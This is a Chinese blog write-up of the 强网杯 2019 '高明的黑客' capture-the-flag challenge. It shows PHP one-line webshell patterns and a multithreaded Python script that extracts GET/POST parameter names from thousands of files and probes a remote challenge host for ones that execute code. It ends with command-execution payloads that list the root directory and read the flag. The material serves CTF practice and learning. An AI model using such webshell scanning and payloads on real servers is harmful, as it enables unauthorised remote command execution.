脚本匹配get,post [强网杯 2019]高明的黑客1

已于 2024-02-29 17:24:47 修改
阅读量401 收藏 6
点赞数 8
文章标签: android
于 2024-02-29 11:12:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/136363439
版权

打开题目

访问www.tgr.gz,下载源码

解压以后发现里面有很多文件,只有一个是index.html,其余都是php文件。并且每个php文件都有若干个一句话木马

尝试访问也有

看大佬的wp是说,应该找存在形如以下的结构,传入payload找flag。

$_GET['ganVMUq3d'] = ' ';

eval($_GET['ganVMUq3d'] ?? ' ');


$_GET['jVMcNhK_F'] = ' ';

system($_GET['jVMcNhK_F'] ?? ' ');


$_GET['cXjHClMPs'] = ' ';

echo `{$_POST['cXjHClMPs']}`;

步骤大致是字符匹配$_GET[$_POST[,尝试往匹配到的参数名传递echo,看看哪些参数可以接收到参数并打印出来。

这里依旧是用大佬的脚本跑一下

import os
import requests
import re
import threading
import time
print('开始时间:  '+  time.asctime( time.localtime(time.time()) ))   #只是一个简单的时间函数,看起来更漂亮罢了
s1=threading.Semaphore(100)                               #这儿设置最大的线程数
filePath = r"D:\www\src"
os.chdir(filePath)                                     #改变当前的路径,这个还是不太懂
requests.adapters.DEFAULT_RETRIES = 5                       #设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)                                            #得到该目录下所有文件的名称
session = requests.Session()                                        #得到session()为之后的实现代码回显得取创造条件
session.keep_alive = False                                # 设置连接活跃状态为False
def get_content(file):
    s1.acquire()                                                       #好像与锁什么的相关,但是还是不太懂,多线程开启
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))  #更好看,同时可以对比不加线程和加线程的时间对比
    with open(file,encoding='utf-8') as f:                   #打开php文件,提取所有的$_GET和$_POST的参数
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}                                         #所有的$_POST
    params = {}                                           #所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url = 'http://2f5d9d10-21b1-4a1d-8d17-52b329e3679e.node5.buuoj.cn:81/'+file
    req = session.post(url, data=data, params=params)        #一次性请求所有的GET和POST
    req.close()                                     # 关闭请求  释放内存
    req.encoding = 'utf-8'
    content = req.text
    #print(content)
    if "xxxxxx" in content:                            #如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()                                     # 关闭请求  释放内存
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()                                     # 关闭请求  释放内存
                if "xxxxxx" in content:
                    break
        if flag == 1:                                      #flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
            param = a
        else:
            param = b
        print('找到了利用文件: '+file+"  and 找到了利用的参数:%s" %param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()                #对应于之前的多线程打开
 
 
for i in files:                                              #加入多线程
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

试了很多脚本,终于有一个是成功的

这里的脚本用的是大佬的

参考博客:[强网杯 2019]高明的黑客(考察代码编写能力)-CSDN博客

最终找到了利用文件: xk0SzyKwfzw.php 

找到了利用的参数:Efa5BVG

命令执行, payload:

xk0SzyKwfzw.php?Efa5BVG=ls /

xk0SzyKwfzw.php?Efa5BVG=cat /flag

得到flag

flag{5ce2a492-b95c-4667-8445-39c0eed3e159}

参考文章:

https://www.cnblogs.com/h3zh1/p/12661892.html

[强网杯 2019]高明的黑客-CSDN博客

https://www.cnblogs.com/darkcyan/p/17673816.html

访白鹿
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[强网杯 2019]高明黑客 1
shinygod的博客
03-06 816
知识点:脚本编写能力 下载文件,并解压文件。 windows可以直接winrar解压,Linux:tar -xzvf file.tar.gz //解压tar.gz 有几千个文件随便访问 有一堆没用的参数,所以这题一个要从几千个文件找那个可以实现一句话木马的地方。 怎么用脚本实现呢?一头雾水,这边用别的师傅的脚本 import os import requests import re import threading import time print('start: '+ time.ascti
BUUctf 刷题之[强网杯 2019]高明黑客 1
dwrnxjlove的博客
08-09 880
[强网杯 2019]高明黑客 1 打开题目之后是一段简单的话: 提示到网站的源码在www.tar.gz里,于是访问,下载网页源码,下载之后发现并不是网页源码,解压下载的文件发现里面有3000多个php文件,于是用D盾粗扫了一遍,发现全是报后门文件,但是尝试利用,发现前面一个文件都不能用,但是这3000多个文件必然有可以用的,于是就尝试进行文件遍历,找出可以利用的文件: 附上自己的脚本: import re import os import requests files = os.listdir(r'C
CTF [强网杯 2019]高明黑客 writeup
baynk的博客
04-07 2053
一来搞下,有点意思,然后直接在url后面加上www.tar.gz进行下载文件下载,这文件有点大,下载的有点慢,我以为是出错了,又去扫目录。。wtf。。不管扫啥都是200。。。 不过好在,等扫描完了,文件下好了。 40M,真的狠,一打开,我惊了。 3000个文件。。命令看起来还没啥规则 。 硬着头皮解压后,随意点开一个文件。 1800多行。。。丢在本地环境里面去运行下,还尼玛报错了。 不...
【BUUCTF】[强网杯 2019]高明黑客
aoao331198的博客
04-26 2308
拿到的源码有3000多个文件,所有文件都是杂乱的 网上wp感觉对题目的理解部分讲解较少,结合蚁剑工具,我觉得题目意思像是说这里面的文件是一句话木马,我们要找到合适的GET或POST参数能执行shell命令。 用脚本暴力跑完所有文件的所有参数,技术不行,只能贴别人的代码 import os import requests import re import threading import time print('开始时间: '+ time.asctime( time.localtime(time.ti.
web buu [强网杯 2019]高明黑客1
weixin_44214568的博客
03-30 344
考点:脚本编写 1.根据提示,查看源码 url+www.tar.gz,下载压缩包,发现是3002个php文件 随便打开一个发现里面有传参$_GET()函数,里面有的直接接了eval,相当于直接执行了参数里面的值,但是经过审计代码发现,里面的很多参数都已经在代码里被赋值,所以我们需要从三千多个文件里找到有用的$_GET(),很显然通过人工寻找有一定难度,那么就需要我们编写脚本 ...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
强网杯SQL题目复现php.zip
最新发布
12-17
【标题】"强网杯SQL题目复现php.zip"是一个针对网络安全竞赛——强网杯的解题资源包,其中包含了与SQL(结构化查询语言)相关的挑战。这个压缩包特别关注了如何在PHP环境中重现这些SQL题目。 【描述】描述中的...
iis6.0post.rar_get post_visual c
09-23
标题 "iis6.0post.rar_get post_visual c" 暗示了这是一个与IIS 6.0 Web服务器相关的项目,重点在于处理POST和GET请求,并且涉及到使用Visual C++进行开发。在这个上下文中,我们可以深入探讨以下几个关键知识点: ...
Shell脚本中通过正则表达式匹配IP地址
10-24
主要介绍了Shell脚本中通过正则表达式匹配IP地址,本文直接给出实现代码,需要的朋友可以参考下
vs2019 中文离线安装包下载脚本
11-15
vs2019 中文离线安装包下载脚本,我们现在微软官方网站下载的安装包一般也就1~2兆,运行这个小安装包的程序时,才真正在网站上下载vs2019,目前的vs2019企业版、专业版、社区版都要20多G,那么也没有网络的情况下...
[强网杯 2019]高明黑客
Sk1y的博客
03-26 3320
目录 解题过程 1. 一个简单的exp 2. python 多线程简单实例 3. 一个低配版的exp 4. 高配版 参考链接: 考点:本题目考查的是编写脚本的能力,从中学到了许多。 解题过程 打开题目后,是这样的,显示网站被黑,但是说明了源码的位置 访问/www.tar.gz ,发现这个源码有近40MB!!! 没办法,下载吧。 下载之后,发现里面有3002个项目,只有一个是index.html,其余都是php文件。并且每个php文件都有若干个一句话木马,这个不可能一个一个试,.
[强网杯 2019]高明黑客(考察代码编写能力)
a3320315的博客
11-07 9616
0x01 试题分析 1、我们先打开题目,提示可以下载源码 下载源码,打开是几千个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,所以我们猜测这几千个php文件中肯定含有可以使用的shell,我们只有写脚本去试了。 0x02 脚本分析 – coding: utf-8 – import os import requests import re import...
[强网杯 2019]高明黑客(每日一题)
qq_51684648的博客
09-07 994
[强网杯 2019]高明黑客(每日一题) 1,打开网页,发现提示,下载文件 2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)] 3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
网安小趴菜
09-28 191
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
强网杯2019(高明黑客&强网先锋上单)
kid的博客
05-30 5574
强网杯2019(高明黑客&强网先锋上单)   前言 这里主要是对强网杯web中高明黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
[强网杯 2019] web题-高明黑客
BROTHERYY的博客
07-08 1013
复现环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji
BUUCTF__[强网杯 2019]高明黑客_题解
风过江南乱的博客
05-31 1738
前言 其实这题的唯一考点就是编写 python 脚本。 用了几天时间来看一下 python ,发现有些内容与我以前学的c语言差不多,只是换个形式而已,比如说 if 、for 、while 对文件操作等等。那最大的特点就是很多功能函数,开箱既用,只需要引用模块就行了。可能这就是面向对象编程的特点吧,你不知道它怎么实现的,你只知道它能干什么。 也有很多不一样的,比如说,迭代、元组、继承、异常处理等等。 还有一点是python2 和python3。有点差别,比如说 print 函数等等,python3 有些东西
《精通脚本黑客》:网络安全入门指南
《精通脚本黑客》是一本由曾云好撰写的实用指南,针对初学者和对WEB安全感兴趣的读者。该书不同于市场上理论性偏重的传统脚本教材,它旨在打破恶性循环,提供安全且实用的学习路径。作者认识到当前市场上的脚本教程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值